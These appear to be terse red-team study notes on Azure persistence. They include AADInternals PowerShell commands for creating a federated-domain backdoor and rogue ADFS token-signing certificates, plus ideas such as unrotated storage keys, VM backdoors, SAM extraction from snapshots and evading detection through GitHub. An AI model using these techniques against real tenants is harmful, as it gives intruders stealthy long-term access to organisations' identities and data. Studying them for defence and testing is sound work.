Azure Persistence

  • if you can modify a resource this is a good avenue for persistence
    • or if you can create one

we can use some attacks for persistence too

we can create new stuff

we can create a new federated domain

PS> ConvertTo-AADIntBackdoor -DomainName domainame.io
PS> Get-MsolUser | select userPrincipalName, ImmutableID
PS> Open-AADIntOffice365Portal ..

ADFS: create a new token signing certificate

PS> New-AADIntADFSSelfSignedCertificates
PS> Update-AADIntADFSFederationSettings -Domain cyberranges.io

storage account access keys

  • SAS URLs
    • you can do this offline with the access keys
  • are not automatically rotated
    • unless keyvault managed storage account

Other Ideas

  • Backdoor Azure VM
    • operating system persistence tools
    • create snapshot of the disk and extract SAM, etc.
  • custom azure AD roles
  • deployment automations
    • attack github, not azure to avoid detection, maybe?